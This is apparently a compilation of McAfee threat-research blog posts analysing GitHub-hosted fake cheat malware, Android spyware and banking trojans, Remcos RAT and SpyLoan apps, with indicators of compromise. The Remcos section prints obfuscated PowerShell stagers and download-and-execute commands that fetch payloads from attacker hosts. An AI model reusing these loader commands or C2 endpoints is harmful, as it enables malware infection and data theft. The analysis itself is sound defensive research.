	github[.]com/SUPAAAMAN/m0dmenu-gta5-free
	github[.]com/atomicthefemboy/cheat-apex-legends-download
	github[.]com/FlqmzeCraft/cheat-escape-from-tarkov
	github[.]com/Notalight/h4ck-f0rtnite
	github[.]com/Notalight/FL-Studio
	github[.]com/Notalight/r0blox-synapse-x-free
	github[.]com/Notalight/cheat-apex-legends-download
	github[.]com/Notalight/cheat-escape-from-tarkov
	github[.]com/Notalight/rust-hack-fr33
	github[.]com/Notalight/Roblox-Blox-Fruits-Script-2024
	github[.]com/Notalight/Rainbow-S1x-Siege-Cheat
	github[.]com/Notalight/SonyVegas-2024
	github[.]com/Notalight/Nexus-Roblox
	github[.]com/Notalight/minecraft-cheat2024
	github[.]com/Notalight/m0dmenu-gta5-free
	github[.]com/ZinkosBR/r0blox-synapse-x-free
	github[.]com/ZinkosBR/cheat-escape-from-tarkov
	github[.]com/ZinkosBR/rust-hack-fr33
	github[.]com/ZinkosBR/Roblox-Blox-Fruits-Script-2024
	github[.]com/ZinkosBR/Rainbow-S1x-Siege-Cheat
	github[.]com/ZinkosBR/Nexus-Roblox
	github[.]com/ZinkosBR/m0dmenu-gta5-free
	github[.]com/ZinkosBR/minecraft-cheat2024
	github[.]com/ZinkosBR/h4ck-f0rtnite
	github[.]com/ZinkosBR/FL-Studio
	github[.]com/ZinkosBR/cheat-apex-legends-download
	github[.]com/EliminatorGithub/counter-str1ke-2-h4ck
	Github[.]com/ashishkumarku10/call-0f-duty-warz0ne-h4ck
EXEs	CB6DDBF14DBEC8AF55986778811571E6
	C610FD2A7B958E79F91C5F058C7E3147
	3BBD94250371A5B8F88B969767418D70
	CF19765D8A9A2C2FD11A7A8C4BA3DEDA
	69E530BC331988E4E6FE904D2D23242A
	35A2BDC924235B5FA131095985F796EF
	EB604E2A70243ACB885FE5A944A647C3
	690DBCEA5902A1613CEE46995BE65909
	2DF535AFF67A94E1CDAD169FFCC4562A
	84100E7D46DF60FE33A85F16298EE41C
	00BA06448D5E03DFBFA60A4BC2219193
C2 Domains	104.21.48.1
	104.21.112.1
	104.21.16.1

 

The post GitHub’s Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools appeared first on McAfee Blog.

Spyware distributed through Amazon Appstore

Authored by Wenfeng Yu and ZePeng Chen

As smartphones have become an integral part of our daily lives, malicious apps have grown increasingly deceptive and sophisticated. Recently, we uncovered a seemingly harmless app called “BMI CalculationVsn” on the Amazon App Store, which is secretly stealing the package name of installed apps and incoming SMS messages under the guise of a simple health tool. McAfee reported the discovered app to Amazon, which took prompt action, and the app is no longer available on Amazon Appstore.

Figure 1. Application published on Amazon Appstore

 

Superficial Functionality: Simple BMI Calculation

On the surface, this app appears to be a basic tool, providing a single page where users can input their weight and height to calculate their BMI. Its interface looks entirely consistent with a standard health application. However, behind this innocent appearance lies a range of malicious activities.

Figure 2. Application MainActivity

 

Malicious Activities: Stealing Private Data

Upon further investigation, we discovered that this app engages in the following harmful behaviors:

1. Screen Recording: The app starts a background service to record the screen and when the user clicks the “Calculate” button, the Android system will pop up request screen recording permission message and start screen recording. This functionality is likely to capture gesture passwords or sensitive data from other apps. In the analysis of the latest existing samples, it was found that the developer was not ready for this function. The code did not upload the recorded mp4 file to the C2 server, and at the beginning of the startRecording() method, the developer added a code that directly returns and does not execute follow code.

Figure 3. Screen Recorder Service Code

 

When the recording starts, the permission request dialog will be displayed.

Figure 4. Start Recording Request.

 

2. Installed App Information: The app scans the device to retrieve a list of all installed applications. This data could be used to identify target users or plan more advanced attacks.

Figure 5. Upload User Data

 

3. SMS Messages: It intercepts and collects all SMS messages received on the device, potentially to capture one-time password (OTP), verification codes and sensitive information. The intercepted text messages will be added to Firebase (storage bucket: testmlwr-d4dd7.appspot.com).

Malware under development:

According to our analysis of historical samples, this malicious app is still under development and testing stage and has not reached a completed state. By searching for related samples on VirusTotal based on the malware’s package name (com.zeeee.recordingappz) revealed its development history. We can see that this malware was first developed in October 2024 and originally developed as a screen recording app, but midway through the app’s icon was changed to the BMI calculator, and the payload to steal SMS messages was added in the latest version.

Figure 6. The Timeline of Application Development

 

The address of the Firebase Installation API used by this app uses the character “testmlwr” which indicates that this app is still in the testing phase.

App Developer Information:

According to the detailed information about this app product on the Amazon page, the developer’s name is: “PT. Visionet Data Internasional”. The malware author tricked users by abusing the names of an enterprise IT management service provider in Indonesia to distribute this malware on Amazon Appstore. This fact suggests that the malware author may be someone with knowledge of Indonesia.

Figure 7. Developer Information

 

How to Protect Yourself

To avoid falling victim to such malicious apps, we recommend the following precautions:

1. Install Trusted Antivirus Apps: Use reliable antivirus software to detect and prevent malicious apps before they can cause harm.
2. Review Permission Requests: When installing an app, carefully examine the permissions it requests. Deny any permissions that seem unrelated to its advertised functionality. For instance, a BMI calculator has no legitimate reason to request access to SMS or screen recording.
3. Stay Alert: Watch for unusual app behavior, such as reduced device performance, rapid battery drain, or a spike in data usage, which could indicate malicious activity running in the background.

Conclusion

As cybercrime continues to evolve, it is crucial to remain vigilant in protecting our digital lives. Apps like “BMI CalculationVsn” serve as a stark reminder that even the simplest tools can harbor hidden threats. By staying alert and adopting robust security measures, we can safeguard our privacy and data.

IoC

Distribution website:

• hxxps://www.amazon.com/PT-Visionet-Data-Internasional-CalculationVsn/dp/B0DK1B7ZM5/

C2 servers/Storage buckets:

• hxxps://firebaseinstallations.googleapis.com/v1/projects/testmlwr-d4dd7
• hxxps://6708c6e38e86a8d9e42ffe93.mockapi.io/
• testmlwr-d4dd7.appspot.com

Sample Hash:

• 8477891c4631358c9f3ab57b0e795e1dcf468d94a9c6b6621f8e94a5f91a3b6a

The post Spyware distributed through Amazon Appstore appeared first on McAfee Blog.

A New Android Banking Trojan Masquerades as Utility and Banking Apps in India

Authored by Dexter Shin

Over the years, cyber threats targeting Android devices have become more sophisticated and persistent. Recently, McAfee Mobile Research Team discovered a new Android banking trojan targeting Indian users. This malware disguises itself as essential services, such as utility (e.g., gas or electricity) or banking apps, to get sensitive information from users. These types of services are vital for daily life, making it easier to lure users. We have previously observed malware that masquerades as utility services in Japan. As seen in such cases, utility-related messages, such as warnings that gas service will disconnect soon unless the bill is checked, can cause significant alarm and prompt immediate action from the users.

We have identified that this malware has infected 419 devices, intercepted 4,918 SMS messages, and stolen 623 entries of card or bank-related personal information. Given the active malware campaigns, these numbers are expected to rise. McAfee Mobile Security already detects this threat as Android/Banker. For more information, visit McAfee Mobile Security

Phishing through messaging platforms like WhatsApp

As of 2024, India is the country with the highest number of monthly active WhatsApp users. This makes it a prime target for phishing attacks. We’ve previously introduced another Banker distributed via WhatsApp. Similarly, we suspect that the sample we recently found also uses messaging platforms to reach individual users and trick them into installing a malicious APK. If a user installs this APK, it will allow attackers to steal the victim’s financial data, thereby accomplishing their malicious goal.

Figure 1. Scammer messages reaching users via Whatsapp (source: reddit)

 

Inside the malware

The malware we first identified was pretending to be an app that allowed users to pay their gas bills. It used the logo of PayRup, a digital payment platform for public service fees in India, to make it look more trustworthy to users.

Figure 2. Malware disguised as gas bills digital payment app

 

Once the app is launched and the permissions, which are designed to steal personal data such as SMS messages, are granted, it asks the user for financial information, such as card details or bank account information. Since this malware pretends to be an app for paying bills, users are likely to input this information to complete their payments. On the bank page, you can see major Indian banks like SBI and Axis Bank listed as options.

Figure 3. Malware that requires financial data

 

If the user inputs their financial information and tries to make a payment, the data is sent to the command and control (C2) server. Meanwhile, the app displays a payment failure message to the user.

Figure 4. Payment failure message displayed but data sent to C2 server

 

One thing to note about this app is that it can’t be launched directly by the user through the launcher. For an Android app to appear in the launcher, it needs to have “android.intent.category.LAUNCHER” defined within an <intent-filter> in the AndroidManifest.xml. However, since this app doesn’t have that attribute, its icon doesn’t appear. Consequently, after being installed and launched from a phishing message, users may not immediately realize the app is still installed on their device, even if they close it after seeing messages like “Bank Server is Down”, effectively keeping it hidden.

Figure 5. AndroidManifest.xml for the sample

 

Exploiting Supabase for data exfiltration

In previous reports, we’ve introduced various C2 servers used by malware. However, this malware stands out due to its unique use of Supabase, an open-source database service. Supabase is an open-source backend-as-a-service, similar to Firebase, that provides PostgreSQL-based database, authentication, real-time features, and storage. It helps developers quickly build applications without managing backend infrastructure. Also, it supports RESTful APIs to manage their database. This malware exploits these APIs to store stolen data.

Figure 6. App code using Supabase

 

A JWT (JSON Web Token) is required to utilize Supabase through its RESTful APIs. Interestingly, the JWT token is exposed in plain text within the malware’s code. This provided us with a unique opportunity to further investigate the extent of the data breach. By leveraging this token, we were able to access the Supabase instance used by the malware and gain valuable insights into the scale and nature of the data exfiltration.

Figure 7. JWT token exposed in plaintext

 

During our investigation, we discovered a total of 5,558 records stored in the database. The first of these records was dated October 9, 2024. As previously mentioned, these records include 4,918 SMS messages and 623 entries of card information (number, expiration date, CVV) and bank information (account numbers, login credentials like ID and password).

Figure 8. Examples of stolen data

 

Uncovering variants by package prefix

The initial sample we found had the package name “gs_5.customer”. Through investigation of their database, we identified 8 unique package prefixes. These prefixes provide critical clues about the potential scam themes associated with each package. By examining the package names, we can infer specific characteristics and likely focus areas of the various scam operations.

Package Name	Scam Thema
ax_17.customer	Axis Bank
gs_5.customer	Gas Bills
elect_5.customer	Electrical Bills
icici_47.customer	ICICI Bank
jk_2.customer	J&K Bank
kt_3.customer	Karnataka Bank
pnb_5.customer	Punjab National Bank
ur_18.customer	Uttar Pradesh Co-Operative Bank

Based on the package names, it seems that once a scam theme is selected, at least 2 different variants are developed within that theme. This variability not only complicates detection efforts but also increases the potential reach and impact of their scam campaigns.

Mobile app management of C2

Based on the information uncovered so far, we found that the malware actor has developed and is actively using an app to manage the C2 infrastructure directly from a device. This app can send commands to forward SMS messages from the victim’s active phones to specified numbers. This capability differentiates it from previous malware, which typically manages C2 servers via web interfaces. The app stores various configuration settings through Firebase. Notably, it utilizes Firebase “Realtime Database” rather than Firestore, likely due to its simplicity for basic data retrieval and storage.

Figure 9. C2 management mobile application

 

Conclusion

Based on our research, we have confirmed that 419 unique devices have already been infected. However, considering the continual development and distribution of new variants, we anticipate that this number will steadily increase. This trend underscores the persistent and evolving nature of this threat, emphasizing the need for careful observation and flexible security strategies.

As mentioned at the beginning of the report, many scams originate from messaging platforms like WhatsApp. Therefore, it’s crucial to remain cautious when receiving messages from unknown or uncertain sources. Additionally, given the clear emergence of various variants, we recommend using security software that can quickly respond to new threats. Furthermore, by employing McAfee Mobile Security, you can bolster your defense against such sophisticated threats.

Indicators of Compromise (IOCs)

 

APKs:

SHA256	Package Name	App Name
b7209653e226c798ca29343912cf21f22b7deea4876a8cadb88803541988e941	gs_5.customer	Gas Bill Update
7cf38f25c22d08b863e97fd1126b7af1ef0fcc4ca5f46c2384610267c5e61e99	ax_17.customer	Client Application
745f32ef020ab34fdab70dfb27d8a975b03e030f951a9f57690200ce134922b8	ax_17.number	Controller Application

Domains:

• https[://]luyagyrvyytczgjxwhuv.supabase.co

Firebase:

• https[://]call-forwarder-1-default-rtdb.firebaseio.com

The post A New Android Banking Trojan Masquerades as Utility and Banking Apps in India appeared first on McAfee Blog.

The Stealthy Stalker: Remcos RAT

Authored By Sakshi Jaiswal, Anuradha M

In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in the world of cybersecurity, gaining traction with its ability to infiltrate systems and compromise sensitive data. This malware, often delivered through phishing emails and malicious attachments, allows cybercriminals to remotely control infected machines, making it a powerful tool for espionage, data theft, and system manipulation. As cyberattacks become more sophisticated, understanding the mechanisms behind RemcosRAT and adopting effective security measures are crucial to protecting your systems from this growing threat. This blog presents a technical analysis of two RemcosRAT variants

The heat map below illustrates the prevalence of Remcos in the field in Q3,2024

 

Variant 1:

In the first variant of Remcos, executing a VBS file triggers a highly obfuscated PowerShell script that downloads multiple files from a command-and-control (C2) server. These files are then executed, ultimately leading to their injection into RegAsm.exe, a legitimate Microsoft .NET executable.

Infection Chain

Analysis:

Executing the VBS file initially triggers a Long-Obfuscated PowerShell command.

 

It uses multi-layer obfuscation, and after de-obfuscation, below is the final readable content.

 

The de-obfuscated PowerShell script performs the following actions:

1. Firstly, the script checks if the PowerShell version is 2.0. then the file will be downloaded from Googledrive “’https://drive.google.com/uc?export=download&id=‘“ in Temp location. and if PowerShell version is not 2.0 then it downloads string from ftp server.
2. It creates a copy of itself in the startup location – \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

 

3. In this case, since the PowerShell version is not 2.0, it will download strings from the FTP server.
4. Uses FTP to download DLL01.txt file, from “ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt” with the username:desckvbrat1 and password: *******************as mentioned in the PowerShell script. Using FileZilla with the provided username and password to download files.

 

5. It has 3 files DLL01.txt, Entry.txt and Rumpe.txt, which contains a URL that provides direct access to a snippet hosted on the PasteCode.io platform.

DLL01.txt File

 

Rumpe.txt String

Figure 11: Snippet which is hosted on PasteCode.io of Rumpe.txt

 

The snippet above is encoded, Decoding it generates ClassLibrary1.dll file.

Entry.txt

 

 

1. Last line of long PowerShell script – [System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType(‘ClassLibrary3.Class1’).GetMethod( ‘prFVI’ ).Invoke( $null , [object[]] ( ‘txt.sz/moc.gnitekrame-uotenok//:sptth‘ , $hzwje , ‘true’ ) ); This line loads a .NET assembly into the current application domain and invokes it.
2. “txt.sz/moc.gnitekrame-uotenok//:sptth” The string is a reversed URL. When reversed, it becomes: https://koneotemarket.com/zst.txt. The raw data hosted in that location is base64 encoded and stored in reversed order. Once decoded and reversed, the content is invoked for execution.

 

1. After invocation, it creates a directory in AppData/Local/Microsoft, specifically within the LocalLow folder. It then creates another folder named “System Update” and places three files inside it.

The LocalLow folder is a directory in Windows used to store application data that requires low user permissions. It is located within the AppData folder. The two paths below show how the malware is using a very similar path to this legitimate windows path.

legitimate Path: C:\Users\<YourUsername>\AppData\LocalLow

Mislead Path: C:\Users\<YourUsername>\AppData\Local\Microsoft\LocalLow

In this case, a LocalLow folder has been created inside the Microsoft directory to mislead users into believing it is a legitimate path for LocalLow.

A screenshot of the files dropped into the System Update folder within the misleading LocalLow directory highlights the tactic used to mimic legitimate Windows directories, intending to evade user suspicion.

 

Content of x3.txt

 

Then x2.ps1 is executed. Content of x2.ps1

 

The command adds a new registry entry in the Run key of the Windows Registry under HKCU (HKEY_CURRENT_USER). This entry ensures that a PowerShell script (yrnwr.ps1) located in the System Update folder inside the misleading LocalLow directory is executed at every user login.

 

After adding registry entry, it executes yrnwr.ps1 file. Content of yrnwr.ps1 which is obfuscated.

 

After Decoding yrnwr.ps1

 

 

 

It utilizes a process injection technique to inject the final Remcos payload into the memory of RegAsm.exe, a legitimate Microsoft .NET executable.

 

Memory String of RegAsm.exe which shows the traces of Remcos

 

 

 

Mutex Created

 

A log file is stored in the %ProgramData% directory, where a folder named “1210” is created. Inside this folder, a file called logs.dat is generated to capture and store all system logging activities.

 

 

Finally, it deletes the original VBS sample from the system.

Variant 2 – Remcos from Office Open XML Document:

This variant of Remcos comes from Office Open XML Document. The docx file comes from a spam email as an attachment.

Infection Chain:

Email Spam:

 

The email displayed in the above image contains an attachment in the form of a .docx file, which is an Office Open XML document.

Analysis:

From the static analysis of .docx file, it is found that the malicious content was present in the relationship file “setting.xml.rels”. Below is the content of settings.xml.rels file:

 

From the above content,it is evident that it downloads a file from an external resource which points to a URL hxxps://dealc.me/NLizza.

The downloaded file is an RTF document named “seethenewthingswhichgivenmebackwithentirethingstobegetbackonlinewithentirethingsbackwithentirethinsgwhichgivenmenewthingsback_______greatthingstobe.doc”which has an unusually long filename.

The RTF file is crafted to include CVE-2017-11882 Equation Editor vulnerability which is a remote code execution vulnerability that allows an attacker to execute arbitrary code on a victim’s machine by embedding malicious objects in documents.

Upon execution, the RTF file downloads a VBS script from the URL “hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF” to the %appdata% directory, saving it as “picturewithmegetbacktouse.vbs”.

Below is the content of VBS file:

 

 

The VBScript is highly obfuscated, employing multiple layers of string concatenation to construct a command. It then executes that command using WScript.Shell.3ad868c612a6

Below is the de-obfuscated code:

 

 

The above code shows that the VBS file launches PowerShell using Base64 encoded strings as the command.

Below is the 1st PowerShell command line:

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -command $Codigo = ‘LiAoIChbc3RyaW5HXSR2ZXJCT1NFUFJFZmVSRU5jRSlbMSwzXSsneCctam9JTicnKSgoKCd7MH11cmwgJysnPSB7Mn1odHRwczovLycrJ3JhJysndy4nKydnaScrJ3QnKydodScrJ2J1Jysnc2VyJysnY29uJysndGVuJysndCcrJy5jb20vTm8nKydEJysnZScrJ3QnKydlYycrJ3RPbi9Ob0RldCcrJ2VjdCcrJ09uL3JlZicrJ3MnKycvJysnaGVhZHMvbWFpbi9EZXRhaCcrJ05vJysndCcrJ2gnKyctVicrJy50eHR7MicrJ307JysnIHswfWJhJysnc2UnKyc2JysnNEMnKydvbnQnKydlJysnbicrJ3QgPSAnKycoTmV3JysnLU9iaicrJ2UnKydjJysndCBTeXMnKyd0ZW0uTmUnKyd0LicrJ1dlYicrJ0MnKydsaWVudCkuRCcrJ28nKyd3bmwnKydvYScrJ2RTdHInKydpbicrJ2coJysneycrJzB9dScrJ3JsKTsgeycrJzAnKyd9JysnYmluYXJ5QycrJ29udGUnKyduJysndCA9JysnICcrJ1tTJysneXN0JysnZW0uQ28nKydudmUnKydydCcrJ10nKyc6OkYnKydyb21CYXNlNjRTdHJpbicrJ2coezB9YmFzZScrJzYnKyc0QycrJ29udGUnKydudCcrJyknKyc7IHsnKycwfScrJ2FzcycrJ2UnKydtYmx5JysnID0nKycgWycrJ1JlZmxlY3QnKydpb24uQXNzZW1ibCcrJ3ldJysnOjpMJysnbycrJ2FkKHswfWJpbicrJ2FyeUMnKydvbicrJ3QnKydlbnQpOyBbZG5saScrJ2IuSU8uSG9tJysnZScrJ106OlZBSSh7JysnMX0nKyd0JysneCcrJ3QuJysnQ1ZGR0dSLzA3Lzc3JysnMS42OS4nKyc0MycrJzEuMScrJzkvLycrJzpwJysndHRoezEnKyd9LCB7JysnMScrJ30nKydkZXNhdGl2YWRvezEnKyd9LCB7MX1kZXMnKydhdGknKyd2YWQnKydvezF9LCB7MX1kZXMnKydhdCcrJ2knKyd2YWRvezF9LCcrJyB7MScrJ31SZScrJ2dBJysncycrJ217JysnMX0sJysnIHsnKycxfXsnKycxfSwnKyd7MX17MX0pJyktZiAgW2NIYVJdMzYsW2NIYVJdMzQsW2NIYVJdMzkpICk=’;$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Base64 decoded content:

 

The above base64 decoded content is used as input to the 2nd PowerShell command.

Below is the 2nd PowerShell command line:

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -windowstyle hidden -executionpolicy bypass -NoProfile -command “. ( ([strinG]$verBOSEPREfeRENcE)[1,3]+’x’-joIN”)(((‘{0}url ‘+’= {2}https://’+’ra’+’w.’+’gi’+’t’+’hu’+’bu’+’ser’+’con’+’ten’+’t’+’.com/No’+’D’+’e’+’t’+’ec’+’tOn/NoDet’+’ect’+’On/ref’+’s’+’/’+’heads/main/Detah’+’No’+’t’+’h’+’-V’+’.txt{2’+’};’+’ {0}ba’+’se’+’6’+’4C’+’ont’+’e’+’n’+’t = ‘+'(New’+’-Obj’+’e’+’c’+’t Sys’+’tem.Ne‘+’t.’+’Web’+’C’+’lient).D’+’o’+’wnl’+’oa’+’dStr’+’in’+’g(‘+'{‘+’0}u’+’rl); {‘+’0’+’}’+’binaryC’+’onte’+’n’+’t =’+’ ‘+'[S’+’yst’+’2024 – New ‘+’nve’+’rt’+’]’+’::F’+’romBase64Strin’+’g({0}base’+’6’+’4C’+’onte’+’nt’+’)’+’; {‘+’0}’+’ass’+’e’+’mbly’+’ =’+’ [‘+’Reflect’+’ion.Assembl’+’y]’+’::L’+’o’+’ad({0}bin’+’aryC’+’on’+’t’+’ent); [dnli’+’b.IO.Hom’+’e’+’]::VAI({‘+’1}’+’t’+’x’+’t.’+’CVFGGR/07/77’+’1.69.’+’43’+’1.1’+’9//’+’:p’+’tth{1’+’}, {‘+’1’+’}’+’desativado{1’+’}, {1}des’+’ati’+’vad’+’o{1}, {1}des’+’at’+’i’+’vado{1},’+’ {1’+’}Re’+’gA’+’s’+’m{‘+’1},’+’ {‘+’1}{‘+’1},’+'{1}{1})’)-f [cHaR]36,[cHaR]34,[cHaR]39) )”

• The PowerShell script uses string obfuscation by combining parts of strings using join and concatenation. This hides the actual URL being fetched.
• It constructs a URL that points to a raw GitHub file: hxxps://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Below is the content of “DetahNoth-V.txt”:

 

Below is the code snippet to decode the above Base64 string into binary format and load it into memory as a .NET assembly. This method avoids writing files to disk, which makes it harder for some security products to detect the operation.

 

The decoded binary content leads to a DLL file named as “dnlib.dll”.

Below is the last part of code in the 2nd PowerShell command line:

 

Once the assembly “dnlib.dll” is loaded, it calls a method VAI from a type dnlib.IO.Home within the loaded assembly. This method is invoked with several arguments:

• txt.CVFGGR/07/771.69.431.19//:ptth: This is a reversed URL (hxxp://91.134.96.177/70/RGGFVC.txt) that might point to another resource.
• desativado (translated from Portuguese as “deactivated”): Passed multiple times as arguments. This is used as a parameter for deactivating certain functions.
• RegAsm: This is the name of the .NET assembly registration tool, potentially indicating that the script is registering or working with assemblies on the machine.

Below is the content of URL -hxxp://91.134.96.177/70/RGGFVC.txt:

 

The content shown above is a reversed, Base64-encoded binary payload, which, when decoded, results in the Remcos EXE payload.

Indicators of Compromise (IOCs)

Variant 1

File Type	SHA256
Vbs	d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2

Variant 2

File Type	SHA256
Eml	085ac8fa89b6a5ac1ce385c28d8311c6d58dd8545c3b160d797e3ad868c612a6
Docx	69ff7b755574add8b8bb3532b98b193382a5b7cbf2bf219b276cb0b51378c74f
Rtf	c86ada471253895e32a771e3954f40d1e98c5fbee4ce702fc1a81e795063170a
Vbs	c09e37db3fccb31fc2f94e93fa3fe8d5d9947dbe330b0578ae357e88e042e9e5
dnlib.dll	12ec76ef2298ac0d535cdb8b61a024446807da02c90c0eebcde86b3f9a04445a
Remcos EXE	997371c951144335618b3c5f4608afebf7688a58b6a95cdc71f237f2a7cc56a2

URLs

hxxps://dealc.me/NLizza

hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF

hxxps://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

hxxp://91.134.96.177/70/RGGFVC.txt

Detections:

Variant 1

FileType	Detection
VBS	Trojan:Script/Remcos.JD

Variant 2

FileType	Detection
Docx	Trojan:Office/CVE20170199.D
RTF	Trojan:Office/CVE201711882.A
VBS	Trojan: Script/Remcos.AM
Powershell	Trojan: Script/Remcos.PS1
EXE	Trojan:Win/Genericy.AGP

Conclusion

In conclusion, the rise of Remcos RAT highlights the evolving nature of cyber threats and the increasing sophistication of malware. As this remote access Trojan continues to target consumers through phishing emails and malicious attachments, the need for proactive cybersecurity measures has never been more critical. By understanding the tactics used by cybercriminals behind Remcos RAT and implementing robust defenses such as regular software updates, email filtering, and network monitoring, organizations can better protect their systems and sensitive data. Staying vigilant and informed about emerging threats like Remcos RAT is essential in safeguarding against future cyberattacks.

References

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/

 

 

 

The post The Stealthy Stalker: Remcos RAT appeared first on McAfee Blog.

SpyLoan: A Global Threat Exploiting Social Engineering

Authored by: Fernando Ruiz

The McAfee mobile research team recently identified a significant global increase of SpyLoan, also known as predatory loan apps, on Android. These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions,  which can lead to extortion, harassment, and financial loss. 

During our investigation of this threat, we identified fifteen apps with a combined total of over eight million installations.  This group of loan apps share a common framework to encrypt and exfiltrate data from a victim’s device to a command and control (C2) server using a similar HTTP endpoint infrastructure. They operate localized in targeted territories, mainly in South America, Southern Asia, and Africa, with some of them being promoted through deceptive advertising on social media.  

McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the apps discovered to Google who have notified the developers that their apps violate Google Play policies and fixes are needed to come into compliance. Some apps were suspended from Google Play while others were updated by the developers. 

McAfee Mobile Security detects all of these apps as Android/PUP.SpyLoan due to our PUP policy since even after some apps have updated to reduce the permissions requirements and the harvesting of sensitive information they still pose a risk for the user’s privacy due to the potential unethical practices that can be conducted by the operators of these apps that are not licensed or registered with the authorities that regulate financial services in each jurisdiction where they operate. 

 

Since 2020, SpyLoan has become a consistent presence   in the mobile threat landscape. However, our telemetry indicates a rapid surge in their activity recently. From the end of Q2 to the end of Q3 2024, the number of malicious SpyLoan apps and unique infected devices has increased by over 75%.   

Understanding the Threat

What Are SpyLoan Apps?

SpyLoan apps are intrusive financial applications that lure users with promises of quick and flexible loans, often featuring low rates and minimal requirements. While these apps may seem to offer genuine value, the reality is that these apps primarily exist to collect as much personal information as possible, which they then may exploit to harass and extort users into paying predatory interest rates. They employ questionable tactics, such as deceptive marketing that highlights time-limited offers and countdowns, creating a false sense of urgency to pressure users into making hasty decisions. Ultimately, rather than providing genuine financial assistance, these apps can lead users into a cycle of debt and privacy violations. 

While the specific behavior may vary by country, these apps share common characteristics and code at app and infrastructure level: 

• Distribution via Official App Stores: Despite violating policies, these apps often slip through app store vetting processes and are available on platforms like Google Play, making them appear trustworthy. 
• Deceptive Marketing: They use names, logos, and user interfaces that mimic reputable financial institutions to gain credibility. Often these loan apps are promoted by ads on social media networks 

“High amount of loan” Add on Facebook for app “Presta Facil: Revision Rapida” which translate to “Easy Loan: Fast Approval” detailing interest rates, amount, period, etc for a loan in Colombian pesos. 

• Similar user flow: After first execution a privacy policy is displayed with the details of what information will be collected, then a countdown timer creates the sense of urgency to apply to the loan offer and the user’s phone number with the country code of the targeted territory is required to continue, asking for a one-time-password (OTP) that is received by SMS to authenticate the user and validate that user has a phone number from the targeted country. 

SpyLoan apps are consistent with this onboarding process. Then navigation bar and app actions are very similar with different graphics but have the same features in their respective localized languages. 

Both apps have in common a framework that shares the user interface, user’s flow and encryption libraries with techniques for communication with C2 infrastructure, while the operators have different locations, language and target countries.

• Privacy agreements: These apps have similar but not equal privacy terms, in general they describe and justify the sensitive data to be collected as part of the user identification process and anti-fraud measures.
  • They require users to consent to collect excessive and exploitative data that a formal financial institution would not normally require, such as SMS message content, call logs and contact lists.
  • The contact information of the financial institution is from free service email domain like Gmail or Outlook, like a personal email address, not from a formal and legal financial institution.
  • The websites implementation of the privacy terms of these SpyLoans apps are built with the same web-framework, using JavaScript to dynamically load the content of the terms, this text is not available in the HTML files directly.

• Excessive Permission Requests: Upon installation, they request permissions that are unnecessary for a loan app, such as access to contacts, SMS, storage, calendar, phone call records and even microphone or camera.

Common permissions on SpyLoan applications can be:

• • permission.CAMERA
  • permission.READ_CALL_LOG
  • permission.READ_PHONE_STATE
  • permission.ACCESS_COARSE_LOCATION
  • permission.READ_SMS

Depending on the implementation and distribution method they can include more sensitive permissions.

• Enticing Offers: Promising quick loans with minimal requirements to attract users in urgent financial situations. A countdown might be displayed to increase the sense of urgency.

Phone Validation via SMS OTP: To complete the registration a phone number with the country code of the target country is required to validate the user’s phone is on the territory, receiving an one time password (OTP) to proceed to the registration via text message.

Data Collection: Users are prompted to provide sensitive legal identification documents and personal information, banking accounts, employee information among with device data that is exfiltrated from the victim’s device.

Impact on Users

Financial Exploitation

• Hidden Fees and High Interest Rates: Users receive less than the promised loan amount but are required to repay the full amount plus exorbitant fees within a short period.
• Unauthorized Charges: Some apps initiate unauthorized transactions or charge hidden fees.

Privacy Violations

• Data Misuse: Personal information is exploited for blackmail or sold to third parties. This might include sextortion with victims’ pictures that can be exfiltrated or created with AI.
• Harassment and Extortion: Users and their contacts receive threatening messages or calls including death threats.

Emotional and Psychological Distress

• Stress and Anxiety: Aggressive tactics cause significant emotional harm.
• Reputational Damage: Public shaming can affect personal and professional relationships.

Back to 2023 in Chile media reported the suicide of a victim of fake loans after the harassment and threats to her friends and family and to her integrity.

Data Exfiltration analysis

The group of SpyLoan applications reported in this blog belongs to the family identified by McAfee as Android/SpyLoan.DE that transmits the collected information encrypted to the command and control (C2) using AES (Advanced encryption standard) with 128bits keys then base64 encoding and optionally adds a hardcoded padding over https.

Encryption key and initialization vector (IV) are hardcoded into the obfuscated application code.

SpyLoan uses this same encryption routine to hide sensitive strings on resources.xml that leads to data exfiltration, for example:

• String skadnjskdf in resources.xml:
  • <string name=”skadnjskdf”>501tm8gR24S8F8BpRDkvnw==</string>
• The AES decrypted value using the same encryption routine implemented for data exfiltration:
  • <string name=”skadnjskdf”>content://sms/</string>

This string is used to construct a content URI that allows access to SMS Messages that it’s implemented to extract fields like, date, address (sender/recipient), message body, status, etc., and formats into JSON that then will be encrypted again to be sent to the C2.

Figure 6: Code section that exfiltrates all SMS messages from Victim’s device

Exfiltrated data is posted into the C2 via HTTP post inside an encrypted JSON object. The URLs of the endpoints used to collect sensitive data shares the URL structure between different SpyLoan applications. They use the same URLs scheme that can be detected by this regex:

^https:\/\/[a-z0-9.-]+\/[a-z]{2,}-gp\/[a-z0-9]+\/[a-z0-9]+$

Some examples of C2 URLs that match this scheme:

• hxxps://su.mykreditandfear.com/her-gp/kgycinc/wjt
• hxxps://hx.nihxdzzs.com/dz-gp/cfmwzu/uyeo
• hxxps://prep.preprestamoshol.com/seg-gp/pdorj/tisqwfnkr
